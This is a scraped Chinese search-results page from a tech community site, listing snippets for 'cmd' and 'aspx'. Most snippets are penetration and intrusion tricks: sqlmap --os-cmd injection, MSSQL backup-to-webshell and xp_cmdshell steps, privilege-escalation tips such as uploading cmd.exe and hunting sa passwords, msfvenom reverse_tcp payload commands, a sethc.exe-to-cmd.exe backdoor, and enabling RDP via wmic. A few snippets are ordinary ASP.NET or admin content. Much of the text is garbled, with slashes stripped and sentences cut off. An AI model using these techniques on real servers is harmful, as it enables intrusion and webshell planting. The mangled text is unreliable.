展开

关键词

记一次利用阿D注入渗透实战案例

.****.cnQuestionAskSearchList1.aspx?Key=%27 http:baike.****.cnQuestionAskSearchList2.aspx? Key= --os-cmd=whoami --threads=10image.png sqlmap -u http:baike.****.cnQuestionAskSearchList2.aspx? .aspx? 阿D注入工具能识别这个注入点,而且在cmd上传模块中的底部有一个上传文件的功能,但是这里仍然不能列出目录,执行部分系统命令时返回的也都是乱码,不过这里还有以下两个思路可以尝试。1. QuestionAskSearchList2.aspx?

19310

Microsoft SQL Server手注之db_owner权限处理

2、创建一张表:cmd,只有一个 a 列,类型为 imageadmin ;create table cmd (a image) --? 4、插入一句话木马到 cmd 表里admin;insert into cmd (a) values ()--? 在sql server 里dbo和sa权限都有备份数据库权限,我们可以把数据库备份成aspx文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。 4、创建脚本文件admin;backup database test to disk=c:inetpubwwwrootsaul1.aspx WITH DIFFERENTIAL,FORMAT;--? 这个时候就得到了webshell:http:192.168.159.137saul1.aspx?由上图可见发现是503,我们上帝视角看看:?确实是写入成功的!就是内存有点大!

74320
  • 广告
    关闭

    90+款云产品免费体验

    提供包括云服务器,云数据库在内的90+款云计算产品。打造一站式的云产品试用服务,助力开发者和企业零门槛上云。

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    一篇文章由浅入深了解MSSQL注入丨404安全

    xp_cmdshell这个xp_cmdshell 找起来更加方便我们调用cmd的命令去搜索,比如我的web目录有个1.aspxC:UsersAleen>for r c: %i in (1*.aspx)  所以我只需要建立一个表 存在一个char字段就可以了http:192.168.130.1371.aspx? http:192.168.130.1371.aspx? id=1;exec master..xp_cmdshell echo ^^ > c:WWW404.aspx ;由于cmd写webshell的主意这些转义的问题 当然条件允许也可以使用certutil或者  @ret = sp_oamethod @f, writeline, NULL,@echo off;exec @ret = sp_oamethod @f, writeline, NULL,start cmd

    66221

    如何创建一个用弹出窗口来查看详细信息的超链接列

    现在让我们来看看WebForm1.aspx和WebForm1.aspx.cs。                   this.BindData();        }        protected void BindData()         {                SqlCommand cmd 它的作用就是在新窗口中打开WebForm2.aspx使用ProductId参数。这个值是来自我们的数据源。我们来看看webform2.aspx和webform2.aspx.cs。 WebForm2.aspx        Product Details                             close window           WebForm2.aspx.cs this.IsPostBack )            this.BindData();     }    protected void BindData()     {       SqlCommand cmd

    16330

    一键安装KMS服务脚本

    Office 2016:https:technet.microsoft.comzh-cnlibrarydn385360(v=office.16).aspx Office 2013:https:technet.microsoft.comZH-CNlibrarydn385360 .aspx Office 2010:https:technet.microsoft.comZH-CNlibraryee624355(v=office.14).aspx Windows:https:docs.microsoft.comzh-cnwindows-serverget-startedkmsclientkeys 使用管理员权限运行 cmd 查看系统版本,命令如下:wmic os get caption使用管理员权限运行 cmd 安装从上面列表得到的 key,命令如下:slmgr ipk xxxxx-xxxxx-xxxxx-xxxxx-xxxxx 使用管理员权限运行 cmd 手动激活系统,命令如下:slmgr ato关于 Office 的激活,要求必须是 VOL 版本,否则无法激活。 使用管理员权限运行 cmd 进入 Office 目录,命令如下:cd C:Program Files (x86)Microsoft OfficeOffice16使用管理员权限运行 cmd 注册 KMS

    1.2K50

    在DataGrid中创建一个弹出式Details窗口

    WebForm1.aspx WebForm1.aspx.cs using System; using System.Collections; using System.ComponentModel; using this.IsPostBack ) this.BindData(); } protected void BindData() { SqlCommand cmd = new SqlCommand( SELECT 功能上,它打开一个新的窗口,带ProductID查询字串的WebForm2.aspx,ProductID的值来自我们的数据源。 this.IsPostBack ) this.BindData(); } protected void BindData() { SqlCommand cmd = new SqlCommand( SELECT InitializeComponent() { this.Load += new System.EventHandler(this.Page_Load); } #endregion } } WebForm2.aspx

    51580

    利用GridView显示主细表并一次编辑明细表所有数据的例子

    全部代码如下: ASPX:@ Page Language=C# ValidateRequest=C# 全部代码如下: ASPX: < html  xmlns =http:www.w3.org1999xhtml cn.Open();       cn1  = new  OleDbConnection(ConnectionString);       cn1.Open();       OleDbCommand cmd = null )       {         OleDbCommand cmd  = new  OleDbCommand( select top 10 * from Document Where  ); return ;     } string  sql;     OleDbCommand cmd;     OleDbConnection cn  = new  OleDbConnection()

    13230

    【好文推荐】各种提权姿势总结

    提权技巧----1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是cmd.com cmd.txt cmd.rar等2.net user不能执行有时候是net.exe ----在aspx大马里,点击“系统信息”第三个就是目前的3389端口或是执行命令查看正在运行的服务:tasklist svc找到:svchost.exe 1688 TermService记住1688这个 命令,就要wscript.shell组建支持,或是支持aspx脚本也行,因为aspx脚本能调用.net组件来执行cmd的命令.Mssql提权----扫描开放的端口,1433开了就可以找sa密码提权,用大马里的搜索文件功能 ,sa密码一般在conn.asp config.asp web.config 这三个文件也可以通过注册表找配置文件,看下支持aspx不,支持的话跨目录到别的站点上找,找到之后用aspshell自带的sql 如果帐号密码默认,直接用shell里面的serv-u提权功能即可搞定,建议用aspx马、php马去提权,因为可以看回显。

    70210

    【好文推荐】各种提权姿势总结

    提权技巧----1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是cmd.com cmd.txt cmd.rar等2.net user不能执行有时候是net.exe ----在aspx大马里,点击“系统信息”第三个就是目前的3389端口或是执行命令查看正在运行的服务:tasklist svc找到:svchost.exe 1688 TermService记住1688这个 命令,就要wscript.shell组建支持,或是支持aspx脚本也行,因为aspx脚本能调用.net组件来执行cmd的命令.Mssql提权----扫描开放的端口,1433开了就可以找sa密码提权,用大马里的搜索文件功能 ,sa密码一般在conn.asp config.asp web.config 这三个文件也可以通过注册表找配置文件,看下支持aspx不,支持的话跨目录到别的站点上找,找到之后用aspshell自带的sql 如果帐号密码默认,直接用shell里面的serv-u提权功能即可搞定,建议用aspx马、php马去提权,因为可以看回显。

    95800

    渗透测试之ASP Web提权

    到可执行目录,右击cmd 虚拟终端,help 然后setp c:windowstempcmd.exe 设置终端路径为:c:windowstempcmd.exe22.当不支持aspx,或是支持但跨不了目录的时候 ASP组件,这样子就可以用了如何找到准确的终端连接端口在aspx大马里,点击“系统信息”第三个就是目前的3389端口或是执行命令查看正在运行的服务:tasklist svc找到:svchost.exe 命令,就要wscript.shell组建支持,或是支持aspx脚本也行,因为aspx脚本能调用.net组件来执行cmd的命令.sa提权扫描开放的端口,1433开了就可以找sa密码提权,用大马里的搜索文件功能 ,sa密码一般在conn.asp config.asp web.config 这三个文件也可以通过注册表找配置文件,看下支持aspx不,支持的话跨目录到别的站点上找,找到之后用aspshell自带的sql 如果帐号密码默认,直接用shell里面的serv-u提权功能即可搞定,建议用aspx马、php马去提权,因为可以看回显。

    1.8K40

    Msfconsole使用总结

    (- -help-formats 列出所有文件格式)Executable formats:asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd windowsmeterpreterreverse_tcp LHOST= LPORT= -f asp > shell.asp20.Aspxmsfvenom -p windowsmeterpreterreverse_tcp LHOST= LPORT= -f aspx

    9530

    Msfvenom参考总结

    (- -help-formats 列出所有文件格式)Executable formats:asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd Aspxmsfvenom -p windowsmeterpreterreverse_tcp LHOST= LPORT= -f aspx > shell.aspx21.

    28230

    msfconsole笔记

    (- -help-formats 列出所有文件格式)Executable formats:asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd Aspxmsfvenom -p windowsmeterpreterreverse_tcp LHOST= LPORT= -f aspx > shell.aspx21.

    4910

    Windows提权WiKi

    blog.cobaltstrike.com20140402what-happens-when-i-type-getsystem 动态链接库搜索顺序https:msdn.microsoft.comen-uslibrarywindowsdesktopms682586(v=vs.85).aspx docs.microsoft.comen-ussysinternalsdownloadsprocmon 动态链接库安全性https:msdn.microsoft.comen-uslibrarywindowsdesktopff919712(v=vs.85).aspx Windows文件和文件夹权限指南https:msdn.microsoft.comen-uslibrarybb727008.aspx SECWIKIhttps:github.comSecWiki Acess Tokenshttps:msdn.microsoft.comen-uslibrarywindowsdesktopaa374909(v=vs.85).aspx 访问令牌的工作原理https:technet.microsoft.comen-uslibrarycc783557 (v=ws.10).aspx Windows REG参考https:ss64.comntreg.html Windows CMD参考https:ss64.comnt 如何使用Regedithttps:www.techsupportalert.comcontentlearn-how-use-windows-registry-editor-regedit-one-easy-lesson.htm

    53931

    第三方组件出奇迹(日常福利)

    一个iis权限,现在也可以看整个D盘不再是www目录同时也支持aspx,但试了一下跟asp一样权限也只能看d盘0x06 一生之敌想执行一下tasklist却发现执行不了,systeminfo也没办法执行直接上 本机——-客户端———(http隧道)———–服务端——————内网服务器服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本机执行最好装上JDK。 Reduh转发14147把服务端的webshell上传到目标服务器,然后访问,我这里是用的aspx的? 这里替换了粘贴键为cmd(把system32目录下的sethc.exe替换为cmd.exe)直接登录服务器5下shift摁出来,cmd弹弹弹System shell GET√?

    68620

    ASP.NET之预编译

    1:打开cmd窗口,运行此段命令:cd C:WindowsMicrosoft.NETFrameworkv4.0.30319,注意最后的是.net的版本号,请你们找到你们程序对应的版本号。 编译之后的代码路径 编译情况:运行上述命令之后,你的编译之后文件夹,会把源代码的文件全部拷贝过来,但是也会少一些东西:1:App_Code文件夹没了,因为已经编译成dll了,存在bin文件夹里了;2:aspx 页面的cs文件也没了,也编译成dll存在bin文件夹里了;3:根目录下的空文件夹没了4:aspx页面还在,但是只是占位符而已,打开aspx文件查看,实际内容早已被修改一句话(这是预编译工具生成的标记文件

    64820

    一次综合渗透测试

    解压后发现是aspx的,我估摸着aspx我也不会呀,审计是不可能审计的了,瞄了一眼源码结构,倒是发现几个有意思的名字。 ? 看名字就明白是啥功能了,直接访问这个文件,发现可以越权访问。 process.BeginOutputReadLine();process.BeginErrorReadLine();process.WaitForExit();return output.ToString();}}      @{var cmd  = ExecuteCommand(cmd.exe, c whoami);        }Output of the injected command (by fuckgov):@cmd测试后发现直接是 然后使用以下cmd命令开启了3389wmic namespace:rootcimv2terminalservices path win32_terminalservicesetting where (_ 传了reGeorg-master的aspx脚本上去,windows下在配合Proxifier进行代理,直接连接,发现可以。这里其实只是单纯地限制了3389不能连接,做个端口转发也行。

    37960

    Metasploit获取不到会话原因

    1、查看防火墙状态: firewall-cmd --state systemctl status firewalld.service 2、开启防火墙: systemctl start firewalld.service systemctl stop firewalld.service 4、永久关闭防火墙: systemctl disable firewalld.service 5、查看所有放行端口: firewall-cmd 流量检测:成功执行Payload并发送stage到目标,但一直卡着不动(ESET NOD32) (7) IIS应用程序池-启用32位应用程序以往的渗透渗透过程中遇到过在浏览器访问Metasploit的Aspx 当“启用32位应用程序”选项为True时Aspx Payload 32可以获取会话,64无法获取会话。 当“启用32位应用程序”选项为False时Aspx Payload 64可以获取会话,32无法获取会话。 【推荐书籍】 如果对你有所帮助,请点个分享、赞、在看呗!

    46440

    网站快照被攻击收录大量垃圾内容

    距离2022年元旦约越来越近,我们发现很多网站用IIS环境尤其是aspx+sqlserver架构的网站总是被攻击,具体症状首先是接到阿里云的通知说是有违规URL通知,然后过了几天发现百度site网站域名 WIN2008系统或Windows2012,2016,2019,环境基本都是IIS7,8,10,SQLSERVER用的是sql2008 sql2012等,基本很大的因素是服务器内存在多个网站,都是些asp+aspx +sqlserver的混合架构,由于网站目录权限没有划分好,导致其中一个网站被入侵,直接牵连服务器内的其他网站,本身ASPX的访问权限就比较大,加上很多人愿意用SQLSERVER的SA用户去调用数据库的连接 以为重做系统就没事了,稳定了1个多月后又被攻击,没办法才让我们对网站安全进行处理,我们接到客户的服务器信息后,登录服务器进行了检查,发现系统用户被增加了多个隐藏账户,而且网站目录下有很多隐藏文件,肉眼是看不到的,必须在CMD 那么了解到这些后门木马后,就要想想黑客是从哪里上传进来的,通过我们的人工代码安全审计,发现后台目录manage是默认的管理后台的目录,存在越权登录,添加附件这里存在后缀变量覆盖,导致直接可以上传ASPX

    9340

    Linux之ack命令

    支持的文件类型 > ack --help-types --actionscript .as .mxml --ada .ada .adb .ads --asm .asm .s --asp .asp --aspx .master .ascx .asmx .aspx .svc --batch .bat .cmd --cc .c .h .xs --cfmx .cfc .cfm .cfml --clojure .clj

    9500

    相关产品

    • 人工智能

      人工智能

      提供全球领先的人脸识别、文字识别、图像识别、语音技术、NLP、人工智能服务平台等多项人工智能技术。

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      扫码关注云+社区

      领取腾讯云代金券